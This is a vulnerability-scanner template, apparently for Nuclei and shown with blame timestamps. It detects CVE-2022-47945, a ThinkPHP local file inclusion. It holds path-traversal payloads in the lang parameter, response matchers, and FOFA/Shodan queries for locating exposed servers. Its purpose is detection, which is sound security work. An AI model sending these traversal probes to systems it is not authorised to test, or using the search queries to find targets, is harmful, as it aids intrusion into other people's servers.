2023-01-15 17:19:02 +00:00
id : CVE-2022-47945
2022-12-23 07:25:38 +00:00
info :
2023-01-16 17:41:15 +00:00
name : Thinkphp Lang - Local File Inclusion
2022-12-23 07:25:38 +00:00
author : kagamigawa
2023-01-15 17:19:02 +00:00
severity : critical
2022-12-23 07:25:38 +00:00
description : |
2023-01-15 17:19:02 +00:00
ThinkPHP Framework before 6.0.14 allows local file inclusion via the lang parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php.
2022-12-23 07:25:38 +00:00
reference :
- https://tttang.com/archive/1865/
2023-01-15 17:19:02 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-47945
2023-01-20 13:34:01 +00:00
- https://github.com/top-think/framework/compare/v6.0.13...v6.0.14
- https://github.com/top-think/framework/commit/c4acb8b4001b98a0078eda25840d33e295a7f099
2023-01-16 17:41:15 +00:00
classification :
2023-01-20 13:34:01 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2023-01-16 10:43:45 +00:00
cve-id : CVE-2022-47945
2022-12-23 07:25:38 +00:00
metadata :
fofa-query : header="think_lang"
2023-01-20 13:34:01 +00:00
shodan-query : title:"Thinkphp"
verified : "true"
2023-01-15 17:19:02 +00:00
tags : cve,cve2022,thinkphp,lfi
2022-12-23 07:25:38 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/?lang=../../thinkphp/base"
- "{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug"
stop-at-first-match : true
matchers-condition : and
matchers :
- type : word
part : body
words :
- 'Call Stack'
- 'class="trace'
condition : and
- type : status
status :
- 500
2023-01-16 17:41:15 +00:00
# Enhanced by mp on 2023/01/15